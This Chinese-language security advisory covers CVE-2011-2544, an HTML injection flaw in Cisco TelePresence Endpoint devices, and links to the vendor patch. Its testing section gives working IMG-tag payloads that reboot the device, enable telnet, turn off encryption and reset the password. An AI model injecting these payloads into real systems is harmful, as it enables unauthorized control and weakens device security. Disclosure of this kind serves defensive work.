Cisco TelePresence Endpoint HTML代码注入漏洞


发布日期:2011-09-19
更新日期:2011-09-19

受影响系统:
Cisco Cisco TelePresence Endpoint MXP F9.1
Cisco Cisco TelePresence Endpoint C TC4.1.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49670
CVE ID: CVE-2011-2544

Cisco TelePresence Endpoint是个人桌面和家庭办公室提供的端点服务。

Cisco TelePresence Endpoint在实现上存在HTML注入漏洞,远程攻击者可利用HTML注入漏洞在受影响浏览器中执行任意脚本代码,窃取cookie身份验证配置。

此漏洞源于H.323 ID或SIP Display Name字段的灵活性以及无法正确验证用户输入。

<*来源:David Klein
 
  链接:http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rebooting the system:
<IMG SRC="/reboot&Yes=please">.
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:
<IMG SRC=/html_select_status?reload=other.ssi&telnet=On>
<IMG
SRC=/html_select_status?reload=security.ssi&/Configuration/Con
ference/Encryption/Mode=Off&/Configuration/SystemUnit/Password
=test>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cisco.com/warp/public/707/advisory.html

相关内容